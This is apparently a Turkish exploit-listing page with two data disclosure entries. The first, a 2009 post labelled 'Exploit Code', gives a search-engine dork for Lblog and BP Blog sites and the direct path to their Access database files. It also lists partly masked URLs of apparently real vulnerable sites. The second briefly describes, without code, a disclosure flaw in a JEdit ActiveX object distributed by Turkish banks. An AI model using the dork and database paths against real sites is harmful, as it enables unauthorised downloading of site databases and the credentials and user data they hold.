Category: veri ifşa

LBlog Ve BBlog veritabanı ifşa açığı admin\db\newFolder\Lblog.mdb

May 14, 2009 yazan by_netex

Exploit Code :  

Dork:''Powered By Lblog''
exploit: " admin\db\newFolder\Lblog.mdb "db(database)
BP Blog V6.0 & V7.0 & V8.0 & V9.0 Database Disclosure Vulnerability
##############################
## {E} www.site.com/{path}/Blog.mdb
## {E}
V6.0 -->> www...s.net/blog/Blog.mdb
V7.0 -->> www.ig...ty.com/blog/Blog.mdb
V8.0 -->> www.ke....org/blog/Blog.mdb
V9.0 -->> www.its...fc.com/blog/Blog.mdb

JEdit ActiveX Objesi, veri ifşa açığı

June 17, 2006 yazan SRLabs.net

Türkiyedeki bir çok bankanın kullanıcılarını tuş kaydedici (keylogger) ve trojan'lara karşı
korumak için hizmete sunduğu JEdit objesinde veri ifşa açığı bulundu. Bu açık kullanılarak
kurumsal ağların güvenlik yapılarını aşmak için önemli bilgilere erişilebiliyor. 
Çeşitli bankalar JEdit objesinin farklı isimlerdeki farklı Build'lerini kullanıcılarının güvenliğini
arttırmak amacıyla dağıtmakta ve bu objeyi yüklemeleri tavsiyesinde bulunmaktadır.